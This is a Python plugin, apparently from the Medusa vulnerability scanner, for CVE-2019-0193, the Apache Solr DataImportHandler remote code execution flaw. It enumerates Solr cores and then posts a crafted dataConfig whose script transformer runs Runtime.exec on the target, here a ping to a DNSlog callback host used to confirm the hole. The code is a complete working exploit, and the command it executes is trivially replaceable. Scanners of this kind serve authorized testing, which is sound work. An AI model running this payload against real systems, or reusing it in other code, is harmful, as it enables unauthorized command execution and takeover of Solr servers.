#!/usr/bin/env python
# -*- coding: utf-8 -*-

__author__ = 'Ascotbe'
import requests
import json
from ClassCongregation import VulnerabilityDetails,UrlProcessing,ErrorLog,WriteFile,Dnslog
requests.packages.urllib3.disable_warnings()
class VulnerabilityInfo(object):
    def __init__(self,Medusa):
        self.info = {}
        self.info['number']="CVE-2019-0193" #如果没有CVE或者CNVD编号就填0，CVE编号优先级大于CNVD
        self.info['author'] = "Ascotbe"  # 插件作者
        self.info['createDate'] = "2020-2-19"  # 插件编辑时间
        self.info['disclosure']='2019-8-1'#漏洞披露时间，如果不知道就写编写插件的时间
        self.info['algroup'] = "SolrRemoteCodeExecutionVulnerability"  # 插件名称
        self.info['name'] ='Solr远程代码执行漏洞' #漏洞名称
        self.info['affects'] = "Solr"  # 漏洞组件
        self.info['desc_content'] = "ApacheSolr如果启用了DataImportHandler模块，因为它支持使用web请求来指定配置信息DIH配置攻击者可构造HTTP请求指定dataConfig参数的值(dataConfig内容)，dataConfig内容完全可控(多种利用方式)，后端处理的过程中，可导致命令执行。"  # 漏洞描述
        self.info['rank'] = "高危"  # 漏洞等级
        self.info['suggest'] = "尽快升级最新系统"  # 修复建议
        self.info['version'] = "ApacheSolr<8.2.0"  # 这边填漏洞影响的版本
        self.info['details'] = Medusa  # 结果


def medusa(Url, RandomAgent, ProxyIp=None):
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores'
        step1 =requests.get(payload_url,timeout=6, headers = headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x
            payload = "/solr/"+name+"/dataimport?_=1582117587113&indent=on&wt=json"
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            headers = {
                'User-Agent': RandomAgent,
                'Accept': 'application/json',
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/x-www-form-urlencoded",
                "X-Requested-With": "XMLHttpRequest"
            }
            DL = Dnslog()  # 初始化DNSlog
            #POC没问题DNSlog有问题
           # DL="p61rpm.dnslog.cn"
            data2="command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(DL.dns_host())
            resp = requests.post(payload_url,data=data2,headers=headers, timeout=20, verify=False)
            if DL.result():
                Medusa = "{}存在Solr远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format(url,payload_url,data2)
                _t = VulnerabilityInfo(Medusa)
                web = VulnerabilityDetails(_t.info)
                web.High()  # serious表示严重，High表示高危，Intermediate表示中危，Low表示低危
                WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

